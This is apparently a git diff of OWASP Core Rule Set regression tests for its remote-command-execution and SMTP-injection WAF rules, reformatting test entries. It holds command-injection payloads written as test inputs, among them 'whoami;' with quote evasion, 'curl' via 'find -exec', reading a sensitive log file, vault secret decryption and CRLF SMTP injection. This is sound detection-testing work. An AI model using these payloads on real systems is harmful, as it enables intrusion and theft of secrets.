input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=time+bsdtar+" - version: HTTP/1.1 - output: - log_contains: id "932260" - - test_title: 932260-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=time+bsdtar+" + version: HTTP/1.1 + output: + log_contains: id "932260" + - test_id: 13 desc: Remote Command Execution bypass with time negative test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=time+warner+" - version: HTTP/1.1 - output: - no_log_contains: id "932260" - - test_title: 932260-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=time+warner+" + version: HTTP/1.1 + output: + no_log_contains: id "932260" + - test_id: 14 desc: Remote Command Injection test for BB finding 935E1D91 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=time+curl+coreruleset.org" - version: HTTP/1.1 - output: - no_log_contains: id "932260" - - test_title: 932260-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=time+curl+coreruleset.org" + version: HTTP/1.1 + output: + no_log_contains: id "932260" + - test_id: 15 desc: Remote Command Injection test for BB finding 935E1D91 - time evasion attempt stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=ti''me+curl+coreruleset.org" - version: HTTP/1.1 - output: - no_log_contains: id "932260" - - test_title: 932260-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=ti''me+curl+coreruleset.org" + version: HTTP/1.1 + output: + no_log_contains: id "932260" + - test_id: 16 desc: System Command Injection test for BB finding AV6ZO3ZS - mixed case stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo='ZsTdcaT+/var/log/sensitive_log_file.zst" - version: HTTP/1.1 - output: - log_contains: id "932260" - - test_title: 932260-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo='ZsTdcaT+/var/log/sensitive_log_file.zst" + version: HTTP/1.1 + output: + log_contains: id "932260" + - test_id: 17 desc: "'find' direct command injection FP test" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=find%20.%201%20-exec%20curl%20google.com%20\\;" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-18 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=find%20.%201%20-exec%20curl%20google.com%20\\;" + version: "HTTP/1.1" + output: + no_log_contains: id "932260" + - test_id: 18 desc: "'find' direct command injection FP test" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=find%20x%20for%20y" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-19 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=find%20x%20for%20y" + version: "HTTP/1.1" + output: + no_log_contains: id "932260" + - test_id: 19 desc: "'ping' direct command injection FP test" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=ping%20127.0.0.1" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-20 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=ping%20127.0.0.1" + version: "HTTP/1.1" + output: + no_log_contains: id "932260" + - test_id: 20 desc: "FP for 'head of'" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "job_title=head%20of" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-21 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "job_title=head%20of" + version: "HTTP/1.1" + output: + no_log_contains: id "932260" + - test_id: 21 desc: "False positive test: 'evaluation' (FP while rule looks for 'eval')" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?word=evaluation" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-22 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?word=evaluation" + version: "HTTP/1.1" + output: + no_log_contains: id "932260" + - test_id: 22 desc: "False positive test: 'schedule' (FP while rule looks for 'sched')" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?word=schedule" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-23 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?word=schedule" + version: "HTTP/1.1" + output: + no_log_contains: id "932260" + - test_id: 23 desc: "FP with word comment Github Issue #3387" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=comment" - version: HTTP/1.0 - output: - no_log_contains: id "932260" - - test_title: 932260-24 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=comment" + version: HTTP/1.0 + output: + no_log_contains: id "932260" + - test_id: 24 desc: "FP against name 'Perlak' (matches 'perl')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?last_name=Perlak" - version: HTTP/1.0 - output: - no_log_contains: id "932260" - - test_title: 932260-25 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?last_name=Perlak" + version: HTTP/1.0 + output: + no_log_contains: id "932260" + - test_id: 25 desc: "FP against word 'Axel'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?first_name=Axel" - version: HTTP/1.0 - output: - no_log_contains: id "932260" - - test_title: 932260-26 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?first_name=Axel" + version: HTTP/1.0 + output: + no_log_contains: id "932260" + - test_id: 26 desc: "FP with word performance" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=performance" - version: HTTP/1.0 - output: - no_log_contains: id "932260" - - test_title: 932260-27 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=performance" + version: HTTP/1.0 + output: + no_log_contains: id "932260" + - test_id: 27 desc: "Block execution of perf command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: "/post" - data: "args=perf --version" - version: HTTP/1.1 - output: - log_contains: id "932260" - - test_title: 932260-28 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: "/post" + data: "args=perf --version" + version: HTTP/1.1 + output: + log_contains: id "932260" + - test_id: 28 desc: | Match despite quote evasion attempt. 932260 accidentally contained a chain rule for some time that enabled trivial bypasses, by excluding matches against number separators (see 932240). stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?a=whoami;0'0'\"" - version: HTTP/1.1 - output: - log_contains: id "932260" - - test_title: 932260-29 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?a=whoami;0'0'\"" + version: HTTP/1.1 + output: + log_contains: id "932260" + - test_id: 29 desc: "FP against word 'Cronk'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?last_name=Cronk" - version: HTTP/1.0 - output: - no_log_contains: id "932260" - - test_title: 932260-30 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?last_name=Cronk" + version: HTTP/1.0 + output: + no_log_contains: id "932260" + - test_id: 30 desc: "Block ad-hoc ansible commands" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible all -m ping - output: - log_contains: id "932260" - - test_title: 932260-31 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible all -m ping + output: + log_contains: id "932260" + - test_id: 31 desc: "Block ansible config dump command" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible-config dump - output: - log_contains: id "932260" - - test_title: 932260-32 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible-config dump + output: + log_contains: id "932260" + - test_id: 32 desc: "Block installing collections from ansible galaxy" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible-galaxy collection install community.general - output: - log_contains: id "932260" - - test_title: 932260-33 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible-galaxy collection install community.general + output: + log_contains: id "932260" + - test_id: 33 desc: "Block ad-hoc ansible commands using ansible-console" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible-console - output: - log_contains: id "932260" - - test_title: 932260-34 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible-console + output: + log_contains: id "932260" + - test_id: 34 desc: "Block ansible-doc command" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible-doc plugin ping - output: - log_contains: id "932260" - - test_title: 932260-35 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible-doc plugin ping + output: + log_contains: id "932260" + - test_id: 35 desc: "Block dumping ansible inventory file and variables" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible-inventory --list - output: - log_contains: id "932260" - - test_title: 932260-36 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible-inventory --list + output: + log_contains: id "932260" + - test_id: 36 desc: "Block ansible pull from remote repository" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible-pull --url example.com - output: - log_contains: id "932260" - - test_title: 932260-37 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible-pull --url example.com + output: + log_contains: id "932260" + - test_id: 37 desc: "Block decrypting ansible secrets" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible-vault decrypt secret - output: - log_contains: id "932260" - - test_title: 932260-38 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible-vault decrypt secret + output: + log_contains: id "932260" + - test_id: 38 desc: "Block execution of ansible playbooks" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible-playbook site.yml - output: - log_contains: id "932260" - - test_title: 932260-39 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible-playbook site.yml + output: + log_contains: id "932260" + - test_id: 39 desc: "Block decryption of secrets with chef-vault" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=chef-vault -i secret - output: - log_contains: id "932260" - - test_title: 932260-40 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=chef-vault -i secret + output: + log_contains: id "932260" + - test_id: 40 desc: "Block execution of chef-shell command" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=chef-shell - output: - log_contains: id "932260" - - test_title: 932260-41 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=chef-shell + output: + log_contains: id "932260" + - test_id: 41 desc: "Block execution chef recipie book" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=chef-run all recipie.rb - output: - log_contains: id "932260" - - test_title: 932260-42 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=chef-run all recipie.rb + output: + log_contains: id "932260" + - test_id: 42 desc: "Block execution chef recipie book against a specific node" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=chef-client -t 1.1.1.1 - output: - log_contains: id "932260" - - test_title: 932260-43 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=chef-client -t 1.1.1.1 + output: + log_contains: id "932260" + - test_id: 43 desc: "Block execution of visudo" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=visudo - output: - log_contains: id "932260" - - test_title: 932260-44 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=visudo + output: + log_contains: id "932260" + - test_id: 44 desc: "Block execution of CrowdSec cscli" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=cscli alerts list - output: - log_contains: id "932260" - - test_title: 932260-45 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=cscli alerts list + output: + log_contains: id "932260" + - test_id: 45 desc: "Test for false positive with name Axel Smith" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: /post - version: HTTP/1.1 - data: | - name=Axel Smith - output: - no_log_contains: id "932260" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: /post + version: HTTP/1.1 + data: | + name=Axel Smith + output: + no_log_contains: id "932260" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml index 3291d5d9d..286396e92 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml @@ -2,158 +2,148 @@ meta: author: "fzipi, azurit" description: "Remote Command Execution: SMTP Command Injection test cases" - enabled: true - name: 932300.yaml +rule_id: 932300 tests: - - test_title: 932300-1 + - test_id: 1 desc: "SMTP MAIL FROM Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aMAIL%20FROM%3A%3Ca%40b.com%3E" - version: HTTP/1.0 - output: - log_contains: id "932300" - - test_title: 932300-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aMAIL%20FROM%3A%3Ca%40b.com%3E" + version: HTTP/1.0 + output: + log_contains: id "932300" + - test_id: 2 desc: "SMTP MAIL FROM Command Injection true negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?text=We%20received%20this%20mail%20from%20Mars" - version: HTTP/1.0 - output: - no_log_contains: id "932300" - - test_title: 932300-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=We%20received%20this%20mail%20from%20Mars" + version: HTTP/1.0 + output: + no_log_contains: id "932300" + - test_id: 3 desc: "SMTP Command Injection negative test 2" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Hello%21%20We%20finally%20received%20this%20mail%20from%3A%3Ctest%40coreruleset.org%3E%2C%20which%20means%20that%20we%20can%20do%20this%20finally. - version: HTTP/1.0 - output: - no_log_contains: id "932300" - - test_title: 932300-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + 